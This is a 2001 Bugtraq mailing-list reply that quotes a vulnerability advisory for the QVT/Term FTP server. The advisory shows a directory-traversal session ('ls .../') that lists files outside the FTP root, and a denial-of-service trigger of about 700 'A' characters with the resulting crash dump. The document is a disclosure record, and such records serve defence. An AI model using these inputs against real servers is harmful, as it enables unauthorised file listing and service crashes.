Bugtraq mailing list archives

Re: Vulnerabilities in QVT/Term


From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Thu, 27 Sep 2001 17:17:40 +0400

Hello joetesta,

This  vulnerability was reported to bugtraq on April, 14 for
both  QVT/Term  and QVT/Net 4.3 and 5.0 by SNS (Strumpf Noir
Society) Research.

--Wednesday, September 26, 2001, 8:13:17 AM, you wrote to bugtraq () securityfocus com:

jhc> -----BEGIN PGP SIGNED MESSAGE-----

jhc> Vulnerabilities in QVT/Term




jhc>     Overview

jhc> QVT/Term v5.0 is a suite of Internet tools available from http://www.qpc.com/.  Two
jhc> vulnerabilities exist in the FTP daemon.  The first allows a remote user to list the files
jhc> outside the ftp root.  The second allows a remote user to crash the server.




jhc>     Details

jhc> The following excerpt demonstrates the file listing problem; an ftp root of 'C:\root\root\'
jhc> was used:


ftp localhost
jhc> Connected to xxxxxxxxx.rh.rit.edu.
jhc> 220 xxxxxxxxx FTP server (QVT/Net 4.3) ready.
jhc> User (xxxxxxxxx.rh.rit.edu:(none)): anonymous
jhc> 331 Guest login OK, please send real ident as password.
jhc> Password:
jhc> 230 Guest login OK, access restrictions apply.
ftp>> ls ../
jhc> 200 PORT command successful.
jhc> 150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes).
jhc> root
jhc> 226 Transfer complete.
jhc> ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec.
ftp>> ls .../
jhc>      [file listing of C:\ is shown here]
jhc> 226 Transfer complete.
jhc> ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec.
ftp>>



jhc> The following is the crash dump that results when a remote user connects to port 21 and
jhc> sends a long stream of 'A's (~700+):



jhc> FTPD caused an invalid page fault in
jhc> module FTPD.EXE at 017f:00404b34.
jhc> Registers:
jhc> EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213
jhc> EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58
jhc> ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7
jhc> EDX=006699a5 ES=0187 EDI=00669ffd GS=0000
jhc> Bytes at CS:EIP:
jhc> f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b
jhc> Stack dump:
jhc> 00000004 00771b90 00666a58 0064fbc0
jhc> 0000060a 12948ae8 00771b90 004105a0
jhc> 00288b30 bff728a2 0187bff7 bff713e2
jhc> 12948b04 0a2c175f 12990002 00288b4c




jhc>     Solution

jhc> No quick fix is possible.




jhc>     Vendor Status

jhc> QPC Software was contacted via <support () qpc com> on Tuesday, September 18, 2001.  No reply
jhc> was received.






jhc>     - Joe Testa

jhc> e-mail:   joetesta () hushmail com
jhc> web page: http://hogs.rit.edu/~joet/
jhc> AIM:      LordSpankatron


jhc> -----BEGIN PGP SIGNATURE-----
jhc> Version: Hush 2.0

jhc> wl0EARECAB0FAjuxgKkWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNAPK
jhc> AJ9wTSs45AV9UKruT/Hikdomqu0IWgCfbDSqFhwDBqLJYqKimvXMV20hPmc=
jhc> =xAvj
jhc> -----END PGP SIGNATURE-----


-- 
~/3APA3A
Почтенные ископаемые! Жду от вас дальнейших писем.  (Твен)


Current thread: